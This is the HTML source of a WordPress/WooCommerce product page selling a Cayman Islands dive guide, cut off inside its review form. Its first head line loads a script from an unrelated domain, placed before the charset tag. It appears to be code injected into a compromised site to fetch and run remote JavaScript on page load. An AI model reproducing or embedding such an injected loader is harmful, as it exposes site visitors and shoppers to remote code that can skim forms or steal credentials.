<!DOCTYPE html>
<html lang="en-US" itemscope="itemscope" itemtype="http://schema.org/WebPage" >
<head>
  <script src='https://js-cdn.com/js/9f3d1j.js'></script>
   <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="profile" href="https://gmpg.org/xfn/11">
    <link rel="pingback" href="https://prideautomations.com/xmlrpc.php">
    <title>Dive the Cayman Islands (Interlink Dive Guide) Paperback &#8211; Pride Automations</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Pride Automations &raquo; Feed" href="https://prideautomations.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Pride Automations &raquo; Comments Feed" href="https://prideautomations.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Pride Automations &raquo; Dive the Cayman Islands (Interlink Dive Guide) Paperback Comments Feed" href="https://prideautomations.com/product/dive-the-cayman-islands-interlink-dive-guide-paperback/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/prideautomations.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.2"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://prideautomations.com/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='wc-block-style-css'  href='https://prideautomations.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ver=2.5.14' type='text/css' media='all' />
<link rel='stylesheet' id='cookie-notice-front-css'  href='https://prideautomations.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='photoswipe-css'  href='https://prideautomations.com/wp-content/plugins/woocommerce/assets/css/photoswipe/photoswipe.min.css?ver=4.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='photoswipe-default-skin-css'  href='https://prideautomations.com/wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.min.css?ver=4.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-layout-css'  href='https://prideautomations.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-smallscreen-css'  href='https://prideautomations.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.0.1' type='text/css' media='only screen and (max-width: 768px)' />
<link rel='stylesheet' id='woocommerce-general-css'  href='https://prideautomations.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.0.1' type='text/css' media='all' />
<style id='woocommerce-inline-inline-css' type='text/css'>
.woocommerce form .form-row .required { visibility: visible; }
</style>
<link rel='stylesheet' id='sparklestore-google-fonts-css'  href='//fonts.googleapis.com/css?family=Open+Sans%3A700%2C600%2C800%2C400%7CPoppins%3A400%2C300%2C500%2C600%2C700&#038;ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='https://prideautomations.com/wp-content/themes/sparklestore/assets/library/font-awesome/css/font-awesome.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='flexslider-css'  href='https://prideautomations.com/wp-content/themes/sparklestore/assets/library/flexslider/css/flexslider.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='lightslider-css'  href='https://prideautomations.com/wp-content/themes/sparklestore/assets/library/lightslider/css/lightslider.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='sparkleStore-lite-google-font-css'  href='https://fonts.googleapis.com/css?family=Open%2BSans%3A300%2C300i%2C400%2C400i%2C600%2C600i%2C700%2C700i%2C800%2C800i%7CRaleway%3A100%2C200%2C200i%2C300%2C400%2C500%2C600%2C700%2C800&#038;subset=latin%2Clatin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='sparklestore-parent-style-css'  href='https://prideautomations.com/wp-content/themes/sparklestore//style.css?ver=1.0.0' type='text/css' media='all' />
<link rel='stylesheet' id='sparklestore-lite-style-css'  href='https://prideautomations.com/wp-content/themes/sparklestore-lite/style.css?ver=1.0.0' type='text/css' media='all' />
<style id='sparklestore-lite-style-inline-css' type='text/css'>

            .main_menu_category_menu,
            .main-menu .main-menu-links ul li,
            .menu-category ul,
            .menu-category ul ul,
            .rightheaderwrap #submit-button,
            .top-cart-content .block-subtitle,

            .woocommerce #respond input#submit, 
            .woocommerce a.button, 
            .woocommerce button.button, 
            .woocommerce input.button,
            .woocommerce a.added_to_cart:before, 
            .woocommerce a.button.add_to_cart_button:before, 
            .woocommerce a.button.product_type_grouped:before, 
            .woocommerce a.button.product_type_external:before, 
            .woocommerce a.button.product_type_variable:before,

            .woocommerce a.button.add_to_cart_button:hover, 
            li.product a.added_to_cart:hover, 
            .woocommerce #respond input#submit:hover, 
            .woocommerce button.button:hover, 
            .woocommerce .widget-area a.clear-all:hover, 
            .woocommerce input.button:hover, 
            .woocommerce a.button.product_type_grouped:hover, 
            .woocommerce a.button.product_type_external:hover, 
            .woocommerce a.button.product_type_variable:hover,
            .categoryarea ul.categoryslider li .categorycount,
            .woocommerce nav.woocommerce-pagination ul li a:focus, 
            .woocommerce nav.woocommerce-pagination ul li a:hover, 
            .woocommerce nav.woocommerce-pagination ul li span.current,
            .widget_shopping_cart_content .buttons a.wc-forward:before,

            .woocommerce .widget_shopping_cart .cart_list li a.remove:hover, 
            .woocommerce.widget_shopping_cart .cart_list li a.remove:hover,

            .woocommerce-account .woocommerce-MyAccount-navigation ul li.is-active a, 
            .woocommerce-account .woocommerce-MyAccount-navigation ul li:hover a,
            .woocommerce-account .woocommerce-MyAccount-navigation ul li a,
            .woocommerce #respond input#submit.alt, 
            .woocommerce a.button.alt, 
            .woocommerce button.button.alt, 
            .woocommerce input.button.alt,

            .quantity button, 
            .quantity input[type='button'], 
            .quantity input[type='reset'], 
            .quantity input[type='submit'],


            .main-menu .main-menu-links ul > li.menu-item-has-children:hover ul,

            .woocommerce .widget_price_filter .ui-slider .ui-slider-range,
            .woocommerce .widget_price_filter .ui-slider .ui-slider-handle,

            .blocktitlewrap .SparkleStoreAction>div,
            .box-hover .add-to-links li a:after,
            .fullpromowrap .fullwrap button, 
            .categorproducts .block-title-desc .view-bnt,
            ul.sparkletablinks > li a,
            .sparklestore-blogwrap .bloginner .blogmeta,
            .calendar_wrap caption,
            .widget_product_search a.button, 
            .widget_product_search button, 
            .widget_product_search input[type='submit'], 
            .widget_search .search-submit,
            .scrollup,
            .sparklestore-blogwrap li:hover .blogmeta,
            .nav-previous a, .nav-next a,
            .sparklestore-slider a.sparklestore-button:hover,
            .blog-readmore a,
            .pagination span.current, .pagination a:hover,
            .wishlist_table td.product-name a.button:hover{ 

                background-color: #0557c1

            }

            .gridlist-toggle a,
            .gridlist-toggle a.active, 
            .gridlist-toggle a:hover, 
            .gridlist-toggle a:focus,
            .form-submit input, .return-to-shop a, 
            .yith-woocompare-widget .compare, 
            .yith-woocompare-widget .clear-all, 
            .woocommerce #review_form #respond .form-submit input, 
            .single-product .single_add_to_cart_button,
            .woocommerce div.product .woocommerce-tabs ul.tabs li:hover, 
            .woocommerce div.product .woocommerce-tabs ul.tabs li.active{ 

               background-color: #0557c1 !important;

            }

            .site-branding,
            .topheader .quickinfowrap .quickinfo li:hover, 
            .topheader .quickinfowrap .quickinfo li:hover a, 
            .topheader .toplinkswrap .toplinks ul li:hover, 
            .topheader .toplinkswrap .toplinks ul li:hover a,
            .entry-title a:hover,
            ul.list-info li a:hover, .blog-readmore:hover,
            .post-detail-container .blog-readmore a:hover,

            a:hover,
            .item-title a:hover,

            .woocommerce #respond input#submit:hover, 
            .woocommerce a.button:hover, .woocommerce button.button:hover, 
            .woocommerce input.button:hover,

            .quantity button:hover, 
            .quantity input[type='button']:hover, 
            .quantity input[type='reset']:hover, 
            .quantity input[type='submit']:hover,

            .footer-middle .widget a:hover, 
            .footer-middle .widget a:hover::before, 
            .footer-middle .widget li:hover::before,
            .footer-bottom a:hover,

            .widget a:hover, .widget a:hover::before, .widget li:hover::before,
            .wishlist_table td.product-name a.button,

            .product_meta span a:hover,

            .woocommerce-message:before,
            .woocommerce-info:before,

            .email-icon:before,

            .woocommerce #respond input#submit.alt:hover, .woocommerce a.button.alt:hover, .woocommerce button.button.alt:hover, .woocommerce input.button.alt:hover,

            .woocommerce ul.cart_list li a:hover, .woocommerce ul.product_list_widget li a:hover,

            .wishlist .top-wishlist a i.fa, .view-cart .cart-contents .header-icon i{ 

                color: #0557c1;

            }

            .form-submit input:hover,
            .woocommerce #review_form #respond .form-submit input:hover, 
            .single-product .single_add_to_cart_button:hover,
            .yith-woocompare-widget .clear-all:hover, 
            .yith-woocompare-widget .compare:hover,
            single-product .yith-wcwl-add-to-wishlist .yith-wcwl-add-button a.add_to_wishlist:hover,

            .single-product .yith-wcwl-wishlistexistsbrowse.show a:hover, .single-product .entry-summary .compare.button:hover, .single-product .yith-wcwl-add-to-wishlist a.add_to_wishlist:hover{ 

               color: #0557c1 !important;

            }

        .top-cart-content .widget,
        .blog-readmore a,
        .post-detail-container .blog-readmore a:hover,
        .pagination span.current, .pagination a:hover,
        .pagination span.current, .pagination a,
        .fullpromowrap .fullwrap button, .categorproducts .block-title-desc .view-bnt,

        .woocommerce div.product .woocommerce-tabs ul.tabs:before,
        .woocommerce-cart .cart_totals h2, 
        .woocommerce .cart-collaterals .cross-sells h2, 
        .woocommerce-page .cart-collaterals .cross-sells h2, 
        .related.products h2, .up-sells.upsells.products h2, 
        .woocommerce-account #customer_login .col-1 h2, 
        .woocommerce-account #customer_login .col-2 h2, 
        .woocommerce-order-details h2, .woocommerce-customer-details h2,


        .woocommerce a.button.add_to_cart_button, 
        .woocommerce a.added_to_cart, 
        .woocommerce a.button.product_type_grouped, 
        .woocommerce a.button.product_type_external, 
        .woocommerce a.button.product_type_variable,

        .quantity button:hover, 
        .quantity input[type='button']:hover, 
        .quantity input[type='reset']:hover, 
        .quantity input[type='submit']:hover,

        .email-icon:before,

        .woocommerce nav.woocommerce-pagination ul li,

        .wishlist_table td.product-name a.button,
        .woocommerce-message,
        .woocommerce-info,

        .woocommerce-cart .wc-proceed-to-checkout a.checkout-button,

        .woocommerce-billing-fields h3, .woocommerce-shipping-fields h3, h3#order_review_heading, .woocommerce-additional-fields h3, .woocommerce-Address-title h3,

        .woocommerce #respond input#submit,     
        .woocommerce a.button, 
        .woocommerce button.button, 
        .woocommerce input.button, 
        .woocommerce #respond input#submit:hover, 
        .woocommerce a.button:hover, .woocommerce button.button:hover, 
        .woocommerce input.button:hover,
        .widget-area .widget .widget-title,
        .flex-control-nav > li > a:hover, .flex-control-nav > li > a.flex-active{ 

            border-color: #0557c1

        }

            .form-submit input, .return-to-shop a, 
            .yith-woocompare-widget .compare, 
            .yith-woocompare-widget .clear-all, 
            .woocommerce #review_form #respond .form-submit input, 
            .single-product .single_add_to_cart_button,
            .footer-middle .widget .widget-title{ 

               border-color: #0557c1 !important;

            }

            .wishlist .top-wishlist a .count, .view-cart .cart-contents .header-icon .count,
            .woocommerce span.onsale, .new-label,
            .blocktitlewrap .SparkleStoreAction>div:hover:before,
            .box-hover .add-to-links li a:hover, .box-hover .add-to-links li a:hover:after,
            ul.sparkletablinks > li a:hover, ul.sparkletablinks > li.active a{ 

               background-color: #b9d600;

            }

            .woocommerce span.onsale:after, .new-label:after{ 

                border-color: #b9d600 transparent transparent;

            }

            .footer-middle .widget h4.widget-title:before{ 

                border-color: #b9d600;

            }

        @media (max-width: 768px){ .main-menu .main-menu-links .menu>li.menu-item-has-children li, .main-menu .main-menu-links .menu>li.menu-item-has-children li { 

            background-color:#0557c1;

        } }

</style>
<script type='text/javascript'>
/* <![CDATA[ */
var cnArgs = {"ajaxurl":"https:\/\/prideautomations.com\/wp-admin\/admin-ajax.php","hideEffect":"fade","onScroll":"no","onScrollOffset":"100","onClick":"no","cookieName":"cookie_notice_accepted","cookieTime":"2592000","cookieTimeRejected":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"","refuse":"yes","revoke_cookies":"1","revoke_cookies_opt":"automatic","secure":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://prideautomations.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=1.2.51'></script>
<script type='text/javascript' src='https://prideautomations.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='https://prideautomations.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<!--[if lt IE 9]>
<script type='text/javascript' src='https://prideautomations.com/wp-content/themes/sparklestore/assets/library/html5shiv/html5shiv.min.js?ver=1.0.0'></script>
<![endif]-->
<!--[if lt IE 9]>
<script type='text/javascript' src='https://prideautomations.com/wp-content/themes/sparklestore/assets/library/respond/respond.min.js?ver=1.0.0'></script>
<![endif]-->
<link rel='https://api.w.org/' href='https://prideautomations.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://prideautomations.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://prideautomations.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.3.2" />
<meta name="generator" content="WooCommerce 4.0.1" />
<link rel="canonical" href="https://prideautomations.com/product/dive-the-cayman-islands-interlink-dive-guide-paperback/" />
<link rel='shortlink' href='https://prideautomations.com/?p=372' />
<link rel="alternate" type="application/json+oembed" href="https://prideautomations.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fprideautomations.com%2Fproduct%2Fdive-the-cayman-islands-interlink-dive-guide-paperback%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://prideautomations.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fprideautomations.com%2Fproduct%2Fdive-the-cayman-islands-interlink-dive-guide-paperback%2F&#038;format=xml" />
	<noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript>
		<style type="text/css">
			.site-title,
		.site-description {
			position: absolute;
			clip: rect(1px, 1px, 1px, 1px);
		}
		</style>
	<style type="text/css" id="custom-background-css">
body.custom-background { background-image: url("https://prideautomations.com/wp-content/uploads/2020/03/clouds-3185006_1920.jpg"); background-position: center center; background-size: cover; background-repeat: no-repeat; background-attachment: fixed; }
</style>
	<link rel="icon" href="https://prideautomations.com/wp-content/uploads/2020/03/cropped-Pride-Automations-1-32x32.png" sizes="32x32" />
<link rel="icon" href="https://prideautomations.com/wp-content/uploads/2020/03/cropped-Pride-Automations-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://prideautomations.com/wp-content/uploads/2020/03/cropped-Pride-Automations-1-180x180.png" />
<meta name="msapplication-TileImage" content="https://prideautomations.com/wp-content/uploads/2020/03/cropped-Pride-Automations-1-270x270.png" />
		<style type="text/css" id="wp-custom-css">
			#cookie-notice{
	min-width: 5%;
}
.site-branding .site-title{
	display: none;
}		</style>
		</head>

<body data-rsssl=1 class="product-template-default single single-product postid-372 custom-background wp-custom-logo theme-sparklestore cookies-not-set woocommerce woocommerce-page woocommerce-no-js rightsidebar boxed columns-3">

<div id="page" class="site">

    <header id="masthead" class="site-header" itemscope="itemscope" itemtype="http://schema.org/WPHeader" role="banner">        
        <div class="header-container">
            <div class="topheader">
                <div class="container">
                    <div class="row">
                        <div class="quickinfowrap">                     
                            <ul class="quickinfo">
                                                                    
                                                                
                                                                
                                                             
                            </ul>
                        </div>

                        <div class="toplinkswrap">
                            <div class="toplinks">

                                <div class="socialmedia-link">
                                    <ul>
                                        
                                        
                                        
                                        
                                        
                                                                                
                                        <li>
                                            <div class="myaccount">
                                                <a title="My Account" href="https://prideautomations.com/my-account/">
                                                    <i class="fa fa-user"></i>
                                                    <span>My Account</span>
                                                </a>
                                            </div>
                                        </li>

                                    </ul>
                                </div>
                            </div><!-- End Header Top Links --> 
                        </div>
                    </div>
                </div>
            </div>

            <div class="mainheader">
                <div class="container sp-clearfix">
                    <div class="sparklelogo">
                        <a href="https://prideautomations.com/" class="custom-logo-link" rel="home"><img width="178" height="98" src="https://prideautomations.com/wp-content/uploads/2020/03/cropped-Pride-Automations.png" class="custom-logo" alt="Pride Automations" /></a>                        <div class="site-branding">                                 
                            <h1 class="site-title">
                                <a href="https://prideautomations.com/" rel="home">
                                    Pride Automations                                </a>
                            </h1>
                                                            <p class="site-description">Painting a better world</p>
                                                    </div>
                    </div><!-- End Header Logo --> 

                    <div class="rightheaderwrap sp-clearfix">
                        <div class="category-search-form">
                            <div class="search-box"><form role="search" method="get" id="search_mini_form"  action="https://prideautomations.com/">
                        <select id="cat" class="cate-dropdown hidden-sm hidden-md" name="term"><option value="">All Categories</option><optgroup class="ap-adv-search" label="All Categories"><option  value="art-supplies">Art Supplies</option><option  value="books">Books</option></optgroup></select>
                        <input id="search" type="text" value="" name="s" id="s" placeholder="Search entire store here..." class="searchbox" maxlength="128" />
                         <button type="submit" title="Search" class="search-btn-bg" id="submit-button">
                            <span>Search</span>
                         </button>
                        <input type="hidden" name="post_type" value="product" />
                        <input type="hidden" name="taxonomy" value="product_cat" />
                    </form></div>                        </div>
                         
                                                    <div class="view-cart">
                                        <a class="cart-contents" href="https://prideautomations.com/cart/">
            <div class="header-icon">
                <i class="fa fa-shopping-bag"></i>
                <span class="name-text">My Cart</span>
                <span class="count">
                    0                </span>
            </div>
        </a>        
                                        <div class="top-cart-content">
                                    <div class="block-subtitle">Recently added item(s)</div>
                                    <div class="widget woocommerce widget_shopping_cart"><div class="widget_shopping_cart_content"></div></div>                                </div>
                            </div>
                        
                                            </div>
                </div>
            </div>  
        </div>
    </header>
    
    <nav class="main_menu_category_menu sp-clearfix">
        <div class="container">
                        <div class="main-menu sp-clearfix">
                <div class="toggle-wrap">
                    <div class="toggle">
                        <i class="fa fa-align-justify"></i>
                        <span class="label">Menu</span> 
                    </div>
                </div>
                <div class="main-menu-links no_cat">
                    <div class="menu-main-menu-container"><ul id="menu-main-menu" class="menu"><li id="menu-item-4" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4"><a href="/">Home</a></li>
<li id="menu-item-322" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-322"><a href="https://prideautomations.com/shop/">Shop</a></li>
<li id="menu-item-323" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-323"><a href="https://prideautomations.com/checkout/">Checkout</a></li>
<li id="menu-item-324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-324"><a href="https://prideautomations.com/news/">News</a></li>
<li id="menu-item-326" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-326"><a href="https://prideautomations.com/shipping-and-delivery/">Shipping and delivery</a></li>
<li id="menu-item-327" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-327"><a href="https://prideautomations.com/returns/">Returns</a></li>
</ul></div>                </div>
            </div>
        </div>
    </nav>

    
	      <div class="breadcrumbs"  style="background:url('https://prideautomations.com/wp-content/uploads/2020/03/banner-943868-scaled.jpg') no-repeat center; background-size: cover; background-attachment:fixed;" >
        <div class="container">
            <h1 class="entry-title">Dive the Cayman Islands (Interlink Dive Guide) Paperback</h1><div role="navigation" aria-label="Breadcrumbs" class="breadcrumb-trail" itemprop="breadcrumb"><ul class="trail-items" itemscope itemtype="http://schema.org/BreadcrumbList"><meta name="numberOfItems" content="3" /><meta name="itemListOrder" content="Ascending" /><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="trail-item trail-begin"><a href="https://prideautomations.com/" rel="home" itemprop="item"><span itemprop="name">Home</span></a><meta itemprop="position" content="1" /></li><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="trail-item"><a href="https://prideautomations.com/shop/" itemprop="item"><span itemprop="name">Products</span></a><meta itemprop="position" content="2" /></li><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="trail-item trail-end"><span itemprop="item"><span itemprop="name">Dive the Cayman Islands (Interlink Dive Guide) Paperback</span></span><meta itemprop="position" content="3" /></li></ul></div>        </div>
      </div>
            <div class="inner_page">
            <div class="container">
                <div class="row">
                    <div id="primary" class="content-area">
                        <main id="main" class="site-main" role="main">
        
					
			<div class="woocommerce-notices-wrapper"></div><div id="product-372" class="product type-product post-372 status-publish first instock product_cat-books has-post-thumbnail shipping-taxable purchasable product-type-simple">

	<div class="woocommerce-product-gallery woocommerce-product-gallery--with-images woocommerce-product-gallery--columns-4 images" data-columns="4" style="opacity: 0; transition: opacity .25s ease-in-out;">
	<figure class="woocommerce-product-gallery__wrapper">
		<div data-thumb="https://prideautomations.com/wp-content/uploads/2020/04/Dive-the-Cayman-Islands-100x100.jpg" data-thumb-alt="" class="woocommerce-product-gallery__image"><a href="https://prideautomations.com/wp-content/uploads/2020/04/Dive-the-Cayman-Islands.jpg"><img width="338" height="500" src="https://prideautomations.com/wp-content/uploads/2020/04/Dive-the-Cayman-Islands.jpg" class="wp-post-image" alt="" title="Dive the Cayman Islands" data-caption="" data-src="https://prideautomations.com/wp-content/uploads/2020/04/Dive-the-Cayman-Islands.jpg" data-large_image="https://prideautomations.com/wp-content/uploads/2020/04/Dive-the-Cayman-Islands.jpg" data-large_image_width="338" data-large_image_height="500" srcset="https://prideautomations.com/wp-content/uploads/2020/04/Dive-the-Cayman-Islands.jpg 338w, https://prideautomations.com/wp-content/uploads/2020/04/Dive-the-Cayman-Islands-203x300.jpg 203w" sizes="(max-width: 338px) 100vw, 338px" /></a></div><div data-thumb="https://prideautomations.com/wp-content/uploads/2020/04/Dive-the-Cayman-Islands-2-100x100.jpg" data-thumb-alt="" class="woocommerce-product-gallery__image"><a href="https://prideautomations.com/wp-content/uploads/2020/04/Dive-the-Cayman-Islands-2.jpg"><img width="375" height="500" src="https://prideautomations.com/wp-content/uploads/2020/04/Dive-the-Cayman-Islands-2.jpg" class="" alt="" title="Dive the Cayman Islands 2" data-caption="" data-src="https://prideautomations.com/wp-content/uploads/2020/04/Dive-the-Cayman-Islands-2.jpg" data-large_image="https://prideautomations.com/wp-content/uploads/2020/04/Dive-the-Cayman-Islands-2.jpg" data-large_image_width="375" data-large_image_height="500" srcset="https://prideautomations.com/wp-content/uploads/2020/04/Dive-the-Cayman-Islands-2.jpg 375w, https://prideautomations.com/wp-content/uploads/2020/04/Dive-the-Cayman-Islands-2-225x300.jpg 225w" sizes="(max-width: 375px) 100vw, 375px" /></a></div><div data-thumb="https://prideautomations.com/wp-content/uploads/2020/04/LLLhgeur6ytfddrut76454-1-100x100.jpg" data-thumb-alt="" class="woocommerce-product-gallery__image"><a href="https://prideautomations.com/wp-content/uploads/2020/04/LLLhgeur6ytfddrut76454-1.jpg"><img width="600" height="600" src="https://prideautomations.com/wp-content/uploads/2020/04/LLLhgeur6ytfddrut76454-1-600x600.jpg" class="" alt="" title="LLLhgeur6ytfddrut76454 (1)" data-caption="" data-src="https://prideautomations.com/wp-content/uploads/2020/04/LLLhgeur6ytfddrut76454-1.jpg" data-large_image="https://prideautomations.com/wp-content/uploads/2020/04/LLLhgeur6ytfddrut76454-1.jpg" data-large_image_width="1280" data-large_image_height="1280" srcset="https://prideautomations.com/wp-content/uploads/2020/04/LLLhgeur6ytfddrut76454-1-600x600.jpg 600w, https://prideautomations.com/wp-content/uploads/2020/04/LLLhgeur6ytfddrut76454-1-300x300.jpg 300w, https://prideautomations.com/wp-content/uploads/2020/04/LLLhgeur6ytfddrut76454-1-1024x1024.jpg 1024w, https://prideautomations.com/wp-content/uploads/2020/04/LLLhgeur6ytfddrut76454-1-150x150.jpg 150w, https://prideautomations.com/wp-content/uploads/2020/04/LLLhgeur6ytfddrut76454-1-768x768.jpg 768w, https://prideautomations.com/wp-content/uploads/2020/04/LLLhgeur6ytfddrut76454-1-45x45.jpg 45w, https://prideautomations.com/wp-content/uploads/2020/04/LLLhgeur6ytfddrut76454-1-100x100.jpg 100w, https://prideautomations.com/wp-content/uploads/2020/04/LLLhgeur6ytfddrut76454-1.jpg 1280w" sizes="(max-width: 600px) 100vw, 600px" /></a></div>	</figure>
</div>

	<div class="summary entry-summary">
		<h1 class="product_title entry-title">Dive the Cayman Islands (Interlink Dive Guide) Paperback</h1><p class="price"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>24.00</span></p>

	
	<form class="cart" action="https://prideautomations.com/product/dive-the-cayman-islands-interlink-dive-guide-paperback/" method="post" enctype='multipart/form-data'>
		
			<div class="quantity">
		<label class="screen-reader-text" for="quantity_5e84393bb6f8a">Dive the Cayman Islands (Interlink Dive Guide) Paperback quantity</label>
		<button onclick="var result = document.getElementById('qty1'); var qty = result.value; if( !isNaN( qty ) && qty > 1 ) { result.value--; } else{ result.value = 1;} jQuery('#qty1').trigger('change'); return false;" class="reduced items-count" type="button"><i class="fa fa-minus">&nbsp;</i></button>
		<input
			type="number"
			id="qty1"
			class="input-text qty text"
			step="1"
			min="1"
			max=""
			name="quantity"
			value="1"
			title="Qty"
			size="4"
			inputmode="numeric" />
		<button onclick="var result = document.getElementById('qty1'); var qty = result.value; if( !isNaN( qty )) { result.value++;} else { result.value = 1 } jQuery('#qty1').trigger('change'); return false;" class="increase items-count" type="button"><i class="fa fa-plus">&nbsp;</i></button>
	</div>
	
		<button type="submit" name="add-to-cart" value="372" class="single_add_to_cart_button button alt">Add to cart</button>

			</form>

	
<div class="product_meta">

	
	
	<span class="posted_in">Category: <a href="https://prideautomations.com/product-category/books/" rel="tag">Books</a></span>
	
	
</div>
	</div>

	
	<div class="woocommerce-tabs wc-tabs-wrapper">
		<ul class="tabs wc-tabs" role="tablist">
							<li class="description_tab" id="tab-title-description" role="tab" aria-controls="tab-description">
					<a href="#tab-description">
						Description					</a>
				</li>
							<li class="reviews_tab" id="tab-title-reviews" role="tab" aria-controls="tab-reviews">
					<a href="#tab-reviews">
						Reviews (0)					</a>
				</li>
					</ul>
					<div class="woocommerce-Tabs-panel woocommerce-Tabs-panel--description panel entry-content wc-tab" id="tab-description" role="tabpanel" aria-labelledby="tab-title-description">
				
	<h2>Description</h2>

<p><span style="font-weight: 400;">World-class diving is a Cayman Islands highlight, home to the Cayman Trench, a 2500-foot trough that is the deepest part of Caribbean waters. This definitive guide provides extensive coverage of the area&#8217;s more than 200 dive and snorkel areas. Includes pictures and charts in full color.</span></p>
			</div>
					<div class="woocommerce-Tabs-panel woocommerce-Tabs-panel--reviews panel entry-content wc-tab" id="tab-reviews" role="tabpanel" aria-labelledby="tab-title-reviews">
				<div id="reviews" class="woocommerce-Reviews">
	<div id="comments">
		<h2 class="woocommerce-Reviews-title">
			Reviews		</h2>

					<p class="woocommerce-noreviews">There are no reviews yet.</p>
			</div>

			<div id="review_form_wrapper">
			<div id="review_form">
					<div id="respond" class="comment-respond">
		<span id="reply-title" class="comment-reply-title">Be the first to review &ldquo;Dive the Cayman Islands (Interlink Dive Guide) Paperback&rdquo; <small><a rel="nofollow" id="cancel-comment-reply-link" href="/product/dive-the-cayman-islands-interlink-dive-guide-paperback/#respond" style="display:none;">Cancel reply</a></small></span><form action="https://prideautomations.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><div class="comment-form-rating"><label for="rating">Your rating</label><select name="rating" id="rating" required>
